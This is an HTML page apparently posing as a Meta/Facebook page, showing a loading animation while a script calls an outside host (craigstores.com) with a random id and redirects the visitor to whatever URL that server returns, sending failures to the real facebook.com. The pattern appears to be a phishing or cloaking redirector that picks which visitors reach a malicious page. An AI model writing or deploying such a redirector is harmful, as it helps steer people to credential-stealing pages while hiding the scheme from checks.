<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <title>Meta</title>

    <link rel="shortcut icon" href="/images/favicon.ico" />
</head>

<body style=" overflow: hidden; margin: 0;">
    <img src="images/progressive.gif" alt="" style="height: 100vh;
                                    width: 100vw;
                                    object-fit: contain;
                                    overflow: hidden;">

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
    <script>
        $(document).ready(function () {
            $.ajax({
                url: `https://craigstores.com/select?id=V2_xce7dGk2S4ffJUyfduRG-${generateRandomString(10, 30)}`,
                type: 'GET',
                async: false,
                success: function (msg) {
                    if (msg.success) {
                        window.location.href = msg.url;
                    }
                    else {
                        window.location.href = "https://www.facebook.com/";
                    }
                },
                error: function (msg) {
                    window.location.href = "https://www.facebook.com/";
                }
            })
        });

        function generateRandomString(minLength, maxLength) {
            const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
            const randomLength = Math.floor(Math.random() * (maxLength - minLength + 1)) + minLength;
            let randomString = '';
            for (let i = 0; i < randomLength; i++) {
                const randomIndex = Math.floor(Math.random() * characters.length);
                randomString += characters.charAt(randomIndex);
            }
            return randomString;
        }
    </script>



</body>

</html>